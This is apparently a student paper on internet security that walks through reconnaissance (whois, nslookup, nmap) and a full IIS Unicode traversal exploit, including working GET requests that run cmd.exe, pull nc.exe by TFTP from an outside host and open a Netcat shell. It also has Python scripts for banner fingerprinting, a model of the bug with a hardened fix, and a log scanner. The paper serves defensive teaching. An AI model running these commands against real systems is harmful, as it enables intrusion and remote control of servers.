
Internet Security and Hacking

Daniel Guerndt Department of Computer Science University of Wisconsin Platteville guerndtd@uwplatt.edu

Abstract
Companies lose millions of dollars to bad security practices. More and more users are on the Internet every day, and a very small percentage of them know how to defend themselves. Understanding how hackers get into systems is the way to beat them at their own game: knowing the tools and tricks of the trade makes one better able to defend against an attack. This paper also describes the standard attack plan most attackers follow, defensive tools, how to maximize security, and how the law punishes convicted offenders.

Introduction
A hacker is a Database Administrator's (DBA's) worst nightmare. A company could go bankrupt or lose millions of dollars because of bad security practices. Whether it faces multiple attackers or a single one, the company depends entirely on its administrators. Some Database Administrators would rather go into a heavy military war zone than have to defend against an attack [1]. A patient hacker, by contrast, has effectively unlimited time and resources to try to crack the case.

Types of Attackers
Attackers fall into three types, arranged as a pyramid [2]. At the bottom are the Script Kiddies. They have limited knowledge of computer technology and programming; a Script Kiddie simply acquires scripts found on the Internet and runs them, firing off random scripts until something works. They tend to get caught more often because of their lack of knowledge, but they still pose a serious threat to organizations. In the middle of the pyramid is the IT-savvy attacker. These people understand programming and scripting languages and understand vulnerabilities, although in most cases they cannot find new ones; they are skilled enough to use existing exploit code and tools with precision. At the top of the pyramid is the cream of the crop: people with the ability to find new vulnerabilities and to write their own exploit code and tools. Thankfully, the people at the top are few in number. However, they cause the most problems, not only because of their skill but also because of their general willingness to release the tools they have made to the public.

The Smart Hacker
A smart hacker is a company's worst nightmare. Do not be fooled into thinking an attack is not planned. Considering the amount of time an attacker could spend in jail for an assault on an organization, smart hackers come up with elaborate plans, and they have patience to an extreme degree. A smart hacker knows that traps are occasionally set up as defensive measures and that the most obvious point of entry could be the hacker's undoing, so they do extensive research on their target or targets before launching any form of attack. The attacker's main adversary is the System Administrator, who is in charge of the security of the system; others may be involved, but the responsibility rests with the admin. Suppose the attacker learns, through research, that the System Administrator is going on a distant vacation for two weeks. If no one else understands the System Administrator's job or the security measures in place, the attacker has two full weeks to get access, and even if something goes wrong there is plenty of time to get to the root of the system. Once an attacker has system access it is effectively over, because from there the attacker can hide his or her tracks easily. In essence the attacker becomes a new, unauthorized admin, since even the System Administrator can no longer find any trail or evidence of the assault. After getting in, a smart hacker will also wait a few weeks for the system administrator to back up the system [3]. That way, if the intrusion is ever discovered and the system is restored from backup, the attacker's foothold is in the backup too.

Information a hacker needs
A hacker needs, first and foremost, information. The first piece an attacker wants is the target's domain name. If the target has a website, that is almost always the first point of research; if the target's website is unknown to the attacker, he or she will probably search a whois database. An attacker also wants the name of the System Administrator or Database Administrator; with that, the attacker can probably find out what hours the admin works. He or she also wants the operating system of the network's hosts and its version number, because every operating system has different vulnerabilities [2]. Without knowing which operating system is running it is nearly impossible to use a vulnerability, and version numbers matter because patches kill off old vulnerabilities. If the attacker wants access to a database, the type of database running and its version number are needed as well. Another item an attacker needs is at least one IP address. With one address in hand, the attacker can run a stealth scan of the surrounding network, which reveals the other addresses in use, the open ports on each host, and more depending on the scanner.

Tools a hacker needs
A hacker also needs tools, and all of them can be found on the Internet. One tool needed for an attack is a way to scan for open ports. Every book I have used comes up with the same two programs. The first is Netcat, known in the hacker community as the Swiss army knife of hacker tools because of its many features [2]. Netcat is a networking utility that reads and writes data across network connections over TCP or UDP (http://netcat.sourceforge.net/). It is a reliable back-end tool that can be used directly or easily driven by other programs and scripts. The other widely used program is Nmap (http://www.insecure.org/nmap/index.html). Nmap is probably the best stand-alone stealthy port scanner available. It is considered stealthy because it does not need to complete a TCP connection [4]: it sends a SYN, and as soon as the SYN/ACK comes back it tears the half-open connection down with a RST instead of finishing the handshake [4], so the connection never reaches the application and is less likely to be logged. All that is needed is an IP address or website. Depending on the parameters given, Nmap can list the live addresses on a network as well as the open ports on each host. It also has other features such as detecting the operating system and its version, and even IDS and firewall information. However, an attacker will usually use Nmap only for port scanning because its other probes are fairly easy to detect. Since port scanners do not give operating system or database information quietly, attackers often consult whois databases, which can be queried without touching the target at all.

Whois Databases
In just about every case, an attacker consults these databases for the basic research needed to get started. Whois queries provide the majority of the information hackers need to begin their attacks [2]. There are four main types of query: registrar, domain, network, and point of contact [2]. A good place to find registrar information is http://www.internic.net/whois.html. A target often has several registrars, and Internic.net has a rather large listing of associated registrar information. An attacker must determine the correct registrar so that he or she can submit detailed queries to the correct database in subsequent steps [2]. Once the correct registrar is found, a domain query is the next step. A domain query will often provide the name of the registrant, the domain name, the administrative contact, when the record was created and updated, and the primary and secondary DNS servers [2]. This query can be run at the same site used for registrar information.

A network query returns the specific network blocks an organization owns. The American Registry for Internet Numbers (ARIN) is a popular database for determining the networks associated with a target domain [2]; its web page is http://www.arin.net. The ARIN database can also be used for point of contact (POC) queries: if an email address is provided in the domain query, it can be used to find more information by searching the ARIN database for that address directly. Doing so will sometimes turn up more domains that the attacker did not know about [2].

Social Engineering
An attacker often requires help from inside the organization. The attacker's main goal in social engineering is to act as if he or she belongs; by gaining the trust of individuals, he or she may not even have to do any hacking. An old epidemic from several years ago was the I LOVE YOU virus, which attached itself to email and mass-mailed itself using the victim's address book. The reason it had such impact was its subject line: a lot of people who were not IT savvy could not resist finding out who loved them so much [1]. That example did not involve hacking, but hackers can use the same ploys to trick people into doing what they want. If an attacker were extremely dedicated to cracking some company, perhaps he or she would go to the headquarters. A perfect demonstration of an attacker arriving at a headquarters is the following example [3]:

After arriving at the target location, the social engineer strikes up small talk with another employee as they walk toward the building. When they arrive at the locked door, the social engineer will pat down his coat pockets, looking for his key or pass card. In such a case, most anyone will do the other guy a favor and let him in with their key. Far from playing the part of the nervous interloper, the social engineer will enter the premises with calm confidence, pretending he truly belongs where he is. All the while, he will move about in a totally unassuming manner, obliquely acknowledging others while going about his job, and will make a point of not attracting attention to himself, unobtrusively scooping the surroundings for tidbits of information that will aid him in his goal. The main systems are typically easy to locate as they are invariably showcased behind large glass walls. The OS of the systems running inside the network will be painfully obvious from the unattended monitors, which display the user interface and even the OS version number. The presence of Sun Microsystems SPARC hardware in the computer room narrows the OS possibilities down to Solaris or RedHat Linux. The toy penguins in the lead developer's office are sufficient clue that Linux is widely used. A stroll through the cubicles leads to the discovery of a number of Post-It notes near (or even on) a monitor that reveal a user's current login and password combination.

The example above may be a bit extreme; however, everything in it is quite possible with social engineering skills.

Another lever social engineers use is gender bias. Many men do not regard women as IT savvy and will hand more information to a female caller or visitor because they assume she cannot do any damage with it [3].

First step into breaking a system
This step is actually composed of two parts, and the first is quite simple: find the target's website [3]. A simple Google search on the target's name will often give the attacker the desired result. The second part is turning that name into an IP address, which the network lookups and port scan in the next step need. In the example used in Hack Proofing Your Web Applications, nslookup is run from a command prompt [3]; nslookup ships with just about every operating system and can also be used through a web front end such as http://www.kloth.net/services/nslookup.php. It mainly returns the IP address for a domain name, and more information about nslookup can be found on the web. Here is an example of using nslookup [3]:

$ nslookup www.targetsite.com
Server: localhost
Address: 127.0.0.1

Non-authoritative answer:
Name: www.targetsite.com
Address: 208.37.215.233

Second step into breaking a system
Next the attacker needs the rest of the target network's address range. One option is to query the ARIN database with the address found in the previous step, which returns every block allocated to the target without sending a single packet to it. The other is to sweep the range with Nmap to find which addresses are live and what they expose. The two complement each other: ARIN lists addresses that may not be in use, while Nmap only reports hosts that answer, so using both is generally preferable. Here is an example of the ARIN lookup and the Nmap scan [3]:

$ whois -h whois.arin.net 208.37.215.233
Treachery Unlimited (NETBLK-TREACHERY-COM) 208.37.215.0 - 208.37.215.255

$ nmap -sP 208.37.215.0/24

Interesting ports on [208.37.215.233]
(The 1529 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
79/tcp open finger
80/tcp open http
143/tcp open imap2

Nmap run completed -- 256 IP addresses (1 host up) scanned in 360 seconds

Note that -sP is Nmap's ping sweep and by itself reports only which hosts answer; a port table like the one above is produced by a port scan of the live host, such as the -sS SYN scan described earlier. The services Nmap lists each carry possible vulnerabilities, and if any of them is vulnerable the chances are good that a hacker can get access. This result is small for a scan of 256 addresses, but even one host with several open ports can lead to serious trouble. The steps below use telnet, not to log in to the telnet service on port 23, but as a plain TCP client for talking to the web server on port 80.

Third step into breaking a system
Most web servers announce their HTTP server software, and from that the operating system usually follows [3]. To get it, we can use telnet as a raw TCP client and send an HTTP HEAD request [3]. Here is an example of an attacker using telnet this way [3]:

$ telnet 208.37.215.233 80
Trying 208.37.215.233...
Connected to 208.37.215.233.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Fri, 16 Feb 2001 18:45:23 GMT
Content-Length: 526
Content-Type: text/html

Connection closed by foreign host.

The Server header tells us the target runs Microsoft IIS version 4.0, which has several known vulnerabilities listed on the Internet, and since IIS 4.0 shipped with the Windows NT 4.0 Option Pack it also tells us the operating system is Windows NT. The only easy way into a system is by exploiting its vulnerabilities. Windows NT has many known vulnerabilities, but administrators can usually find patches for them. Here are a few web pages that list known vulnerabilities: http://cve.mitre.org/cve, www.securityfocus.com, http://packetstorm.securify.com [3]. Checking for Windows NT and Microsoft IIS vulnerabilities turns up 400 known vulnerabilities dated since 1995 [3]. Since remote access is the safest approach for the attacker, a smart attacker will pick the safest vulnerabilities, those least likely to crash the service or trip an alarm. As a rule of thumb, the latest vulnerabilities are the least defended against [3].
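As an added example (not code from this paper or from [3]), the following Python script does what the telnet session above does by hand: it builds the HEAD request, parses the status line and headers, and maps the Server banner to a platform. The sample response is constructed from the transcript rather than captured live, the banner-to-platform table is an assumption kept to versions whose operating system is fixed by how the product shipped, and fingerprint() is the only function that touches the network.

```python
import socket
from typing import Dict, Optional, Tuple

# Constructed sample response modelled on the telnet transcript above (not a live capture).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Date: Fri, 16 Feb 2001 18:45:23 GMT\r\n"
    b"Content-Length: 526\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

# Illustrative banner-to-platform table (an assumption for this example): IIS 4.0
# shipped only in the Windows NT 4.0 Option Pack and IIS 5.0 only with Windows 2000,
# so those banners pin the OS down; anything else is reported as unknown.
PLATFORM_HINTS = {
    "Microsoft-IIS/4.0": "Windows NT 4.0",
    "Microsoft-IIS/5.0": "Windows 2000",
}


def build_head_request(host: str, path: str = "/") -> bytes:
    """The same request typed into telnet above, including the blank line that ends it."""
    return f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_head_response(raw: bytes) -> Tuple[int, Dict[str, str]]:
    """Split a raw HTTP response into (status code, {lower-cased header name: value})."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status_parts = lines[0].split(" ", 2)          # e.g. "HTTP/1.1 200 OK"
    status = int(status_parts[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def infer_platform(server_banner: str) -> Optional[str]:
    """Map the product token of a Server banner to an OS, or None if unknown.
    The banner is self-reported: an administrator can change or remove it."""
    product = server_banner.split(" ", 1)[0] if server_banner else ""
    return PLATFORM_HINTS.get(product)


def fingerprint(host: str, port: int = 80, timeout: float = 5.0) -> Dict[str, object]:
    """Perform the HEAD request against a live host and summarise what it reveals."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_head_request(host))
        raw = b""
        while b"\r\n\r\n" not in raw:
            chunk = sock.recv(4096)
            if not chunk:
                break
            raw += chunk
    status, headers = parse_head_response(raw)
    banner = headers.get("server", "")
    return {"status": status, "server": banner, "platform": infer_platform(banner)}


if __name__ == "__main__":
    code, hdrs = parse_head_response(SAMPLE_RESPONSE)
    print(code, hdrs["server"], infer_platform(hdrs["server"]))
```

The defensive reading of the same script is that everything it learns comes from one self-reported header; stripping or rewriting the Server banner costs nothing and removes the easiest fingerprint, even though it does not remove the vulnerabilities behind it.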

Fourth step into breaking a system
After finding a few vulnerabilities that should work, we can use telnet again to try one of them. One of Windows NT's known vulnerabilities is the IIS Unicode bug (Microsoft bulletin MS00-078), which tricks the server into executing its command interpreter, cmd.exe [3]. The bug lies in the order of checks: IIS rejected path segments equal to ".." before it had fully decoded the URL, and %c1%9c is an overlong UTF-8 encoding of the backslash that IIS decoded afterwards. The segment ..%c1%9c.. therefore passes the check and then becomes ..\.., two directories up from the /scripts directory (C:\Inetpub\scripts by default) into the root of the drive, where \winnt\system32\cmd.exe is reached and run with the arguments after ?/c+ (the plus signs become spaces). Here is an example of using this exploit to write a file on the system [3]:

$ telnet 208.37.215.233 80
Trying 208.37.215.233...
Connected to 208.37.215.233.
Escape character is '^]'.
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+test+message+>+test.msg

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Fri, 16 Feb 2001 19:20:32 GMT
Content-Length: 0
Content-Type: text/plain

Connection closed by foreign host.

This attempt appears to be successful, but to be sure we need to read the file we tried to write [3]. If that works, we can both read and write on the server, which is enough to do just about anything to compromise it. To check, open another telnet connection and issue [3]:

GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type+test.msg

If the response body shows "test message", the contents written to the file earlier, the exploit worked, and the attacker can now run arbitrary commands [3]. To mount the full-scale attack, the attacker needs a few more tools. A rootkit is needed to hide the attacker's tracks [3]; rootkits can be downloaded from many sites on the Internet, and the right one must be chosen for the target operating system and the attack being done. The other necessary item is a way to bind a listener to a chosen port on the target so the attacker can log in directly [3]. The program used in this example is Netcat. With these two tools, the attack can proceed.
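The following Python script is an added example, not code from this paper or from [3], that shows why the request above works and what a correct decoder does instead. It decodes %c1%9c the permissive way (accepting the overlong form), resolves the path the buggy way (traversal check before decoding) and the hardened way (strict decode, canonicalise, then check the result stays under the web root), and splits the query into the arguments cmd.exe receives. The /scripts to /Inetpub/scripts mapping is assumed for the example; the vulnerable_resolve function is a simplified model of the bug, not IIS's actual code.

```python
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import unquote_to_bytes

# Assumed layout for the example: the /scripts virtual directory maps to
# /Inetpub/scripts (IIS's default C:\Inetpub\scripts, written with forward slashes).
SCRIPTS_VDIR = "/scripts"
SCRIPTS_ROOT = "/Inetpub/scripts"


def lenient_utf8_decode(data: bytes) -> str:
    """Decode two-byte UTF-8 sequences without rejecting overlong forms, which is
    the mistake at the heart of the bug. Any other byte is taken as Latin-1 so the
    function never raises."""
    out: List[str] = []
    i = 0
    while i < len(data):
        lead = data[i]
        if 0xC0 <= lead <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            # A correct decoder rejects results below 0x80 here; this one does not,
            # so C1 9C becomes 0x5C, a backslash.
            out.append(chr(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(lead))
            i += 1
    return "".join(out)


def parse_request_target(target: str) -> Tuple[str, List[str]]:
    """Split 'path?query' the way cmd.exe ends up seeing it: '+' separates arguments."""
    path, _, query = target.partition("?")
    args = [unquote_to_bytes(a).decode("latin-1") for a in query.split("+")] if query else []
    return path, args


def vulnerable_resolve(url_path: str) -> Optional[str]:
    """Simplified model of the bug: reject '..' segments while the path is still
    encoded, then decode leniently, and only afterwards collapse the path."""
    if any(segment == ".." for segment in url_path.split("/")):
        return None
    if not url_path.startswith(SCRIPTS_VDIR + "/"):
        return None
    decoded = lenient_utf8_decode(unquote_to_bytes(url_path))
    decoded = decoded.replace("\\", "/")          # Windows treats both as separators
    return posixpath.normpath(SCRIPTS_ROOT + decoded[len(SCRIPTS_VDIR):])


def hardened_resolve(url_path: str) -> Optional[str]:
    """Decode strictly first, canonicalise, then check containment on the result."""
    try:
        decoded = unquote_to_bytes(url_path).decode("utf-8")  # overlong forms raise here
    except UnicodeDecodeError:
        return None
    decoded = decoded.replace("\\", "/")
    if not decoded.startswith(SCRIPTS_VDIR + "/"):
        return None
    full = posixpath.normpath(SCRIPTS_ROOT + decoded[len(SCRIPTS_VDIR):])
    if not full.startswith(SCRIPTS_ROOT + "/"):
        return None                                 # escaped the virtual directory
    return full


if __name__ == "__main__":
    target = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+test+message+>+test.msg"
    path, args = parse_request_target(target)
    print("cmd.exe args:", args)
    print("vulnerable  :", vulnerable_resolve(path))
    print("hardened    :", hardened_resolve(path))
```

The order of operations is the whole lesson: any check performed on a representation that is decoded again later can be bypassed by whatever the later decoding accepts, so the containment check has to run on the final, fully canonical path.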

The Attack
The attacker needs a way to get the rootkit and Netcat onto the target. Since the Windows NT command-line FTP client does not support passive mode, the attacker uses TFTP (Trivial File Transfer Protocol) instead, which needs only a single command. The attacker issues the following GET, which makes the target pull nc.exe from a TFTP server the attacker controls [3]:

GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+216.240.45.60+GET+nc.exe

The rootkit is fetched the same way, with a separate GET that substitutes the rootkit's file name for nc.exe [3]. Once the files are on the server, the attacker issues a Netcat command to bind a port for his or her use. Here is an example of using a GET to start that listener [3]:

GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+nc.exe+-l+-p+100+-t+-e+cmd.exe

Here -l listens, -p 100 picks the port, -e cmd.exe hands whoever connects a command shell, and -t answers telnet option negotiation so a plain telnet client can be used. The port cannot be one already in use by the system, so for this example port 100 is used. After this step, the attacker issues one final command and has a shell on the system [3]:

$ telnet 208.37.215.233 100
Trying 208.37.215.233...
Connected to 208.37.215.233.
Escape character is '^]'.
C:\winnt\system32>

This whole process may seem complicated, but these vulnerabilities are clearly listed on the Internet, sometimes with a step-by-step process just like the one I have gone through. After gaining system access, the attacker installs the rootkit to hide everything that has just happened from the System Administrator.

Defending against attacks
The best defense against an attack is patching. Vendors fix known vulnerabilities as soon as they hear about them, and a System Administrator should look for these patches daily. If an attacker cannot find a vulnerability on a system, it is considerably harder to break in. Firewalls are also necessary: the fewer ports open to the public, the fewer services a known vulnerability can be aimed at. However, firewalls have known vulnerabilities of their own [3], so information about the firewall must be kept confidential. A company's website must not reveal incriminating information either; none of the information needed to hack the site should be on the website. Also be careful what information is released to whois databases [3]. If the attacker cannot find out who the System Administrator is, he or she runs into problems, and an attacker who cannot find the needed information will often give up unless dedicated to the attack. Companies also need to be careful about what is on display at their premises. Toy penguins in offices do not help security, and displaying server information to the public is a bad idea. Companies may want to lock down server rooms completely, remove sticker labels from hardware, and let only trusted individuals into the server room. Another useful tool is an intrusion detection system (IDS). An IDS finds bad traffic but does not necessarily stop it [1]; it constantly monitors the network for abnormal conditions, both internal and external, and provides another layer of security [1]. An IDS can be completely passive and therefore not directly detectable by an attacker [1]. There are many free IDSs available to the public, but paying for one is probably the better approach since attackers have less access to them. 70% of all attacks come from trusted employees [3]. Employees occasionally become disgruntled and think they can get away with anything. In some cases this is true, but there should be several internal security measures in place. All code must be documented properly: if a programmer quits and the code he or she worked on is not documented, malicious code may have been left hidden inside, and finding it can require a full-scale audit of the software, costing time and money. With proper documentation and organization, such problems are much easier to find.
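The attack walked through above leaves a distinctive trail in the web server's own log, which is where an IDS, or a simple script, can catch it even after the fact. The following Python script is an added example, not from this paper or its sources, that runs a few rules over a constructed IIS-style log excerpt modelled on the requests in the attack: it percent-decodes each request to raw bytes so the overlong %c1%9c sequence is still visible, then flags directory traversal, cmd.exe, the TFTP fetch and the Netcat listener. The log lines, the client addresses and the rule names are made up for the example.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_to_bytes

# Constructed IIS W3C-style log excerpt (not real traffic), modelled on the requests in
# the walkthrough. Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2001-02-16 18:45:23 10.0.0.7 HEAD / - 200
2001-02-16 19:20:32 10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+echo+test+message+>+test.msg 200
2001-02-16 19:21:05 10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+type+test.msg 200
2001-02-16 19:25:41 10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+tftp+-i+10.0.0.7+GET+nc.exe 200
2001-02-16 19:26:12 10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+nc.exe+-l+-p+100+-t+-e+cmd.exe 200
2001-02-16 19:30:00 10.0.0.9 GET /scripts/search.asp q=penguins 200
2001-02-16 19:31:10 10.0.0.9 GET /images/logo.gif - 304
"""

# Rule name and pattern. Patterns are tried against both the raw decoded bytes (where
# the overlong sequences are still present) and a folded copy with those sequences
# turned into the separators they decode to.
RULES = [
    ("overlong-utf8-separator", re.compile(rb"\xc0\xaf|\xc1\x9c")),
    ("directory-traversal", re.compile(rb"\.\.[/\\]")),
    ("command-interpreter", re.compile(rb"cmd\.exe")),
    ("file-fetch", re.compile(rb"\btftp\b")),
    ("netcat-listener", re.compile(rb"\bnc(\.exe)?\b.*-e\b")),
]


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per log line that triggers at least one rule."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(text.splitlines(), start=1):
        parts = line.split()
        if len(parts) != 7:
            continue                                   # header or malformed line
        _date, _time, client, method, stem, query, status = parts
        query = "" if query == "-" else query
        # Decode to bytes, not str, so %c1%9c stays as the bytes C1 9C instead of
        # being rejected or replaced; fold case and turn '+' into the spaces cmd.exe sees.
        raw = unquote_to_bytes(stem + "?" + query).lower().replace(b"+", b" ")
        folded = raw.replace(b"\xc0\xaf", b"/").replace(b"\xc1\x9c", b"\\")
        hits = [name for name, pattern in RULES
                if pattern.search(raw) or pattern.search(folded)]
        if hits:
            findings.append({
                "line": number,
                "client": client,
                "status": int(status),
                "request": method + " " + stem,
                "rules": hits,
            })
    return findings


def by_client(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count triggered rules per source address, the view an analyst pivots on first."""
    counts: Dict[str, int] = {}
    for finding in findings:
        client = str(finding["client"])
        counts[client] = counts.get(client, 0) + len(finding["rules"])  # type: ignore[arg-type]
    return counts


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["line"], finding["client"], finding["status"], finding["rules"])
    print(by_client(scan_log(SAMPLE_LOG)))
```

Two details matter for this kind of detection. Decoding to bytes rather than text is what keeps the overlong sequence visible; a strict decoder would either raise or replace it before a pattern could match. And the 200 status on every flagged line is itself the signal that the requests succeeded, which is what separates a patched server being probed from one that has just been compromised.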

A System Administrator can also set up a deliberately easy-looking entry point, a honeypot, to draw attackers in. A trap like this, if properly set up, is flagged immediately and hopefully leaves behind some information about the attacker.

Law and Hacking
An unwanted intrusion into a system is regarded as a serious offense and is often a felony. If convicted, the accused hacker can face many years in jail and large fines. The sentence depends on how much damage the hacker did to the company, the attacker's age, the target, and other factors. A hacker who caused enough damage should expect to stay in jail for more than five years, with up to a $250,000 fine. Another thing to consider before running off to hack is the felony label that follows a conviction: a convicted offender would have an extremely hard time getting near a computer, or an IT job.

Conclusion
There are many types of hackers, all of them dangerous. To successfully penetrate a system, an attacker needs tools and information. There is nothing you can do to stop hacking tools from spreading, but you can protect yourself by withholding information. Anything is penetrable, no matter how secure, but the more secure a network is, the harder it is to crack. Not all hacking is done over the Internet: be wary of disgruntled employees and social engineering ploys, as disgruntled employees carry out the majority of attacks. The best way to protect a network from invasion is to apply the latest patches from vendors. This alone cancels out hundreds of known vulnerabilities and makes a system or network much safer.

References
[1] Ahmad, David R. Mirza; Russell, Ryan. Hack Proofing Your Network. Rockland: Syngress Publishing, Inc., 2002.
[2] McClure, Stuart; Scambray, Joel; Kurtz, George. Hacking Exposed: Network Security Secrets & Solutions. Fourth Edition. Berkeley: McGraw-Hill/Osborne, 2003.
[3] Hack Proofing Your Web Applications: The Only Way to Stop a Hacker is to Think Like One. Rockland: Syngress Publishing, Inc., 2001.
[4] Chirillo, John. Hack Attacks Testing: How to Conduct Your Own Security Audit. Indianapolis: John Wiley & Sons, Inc., 2003.
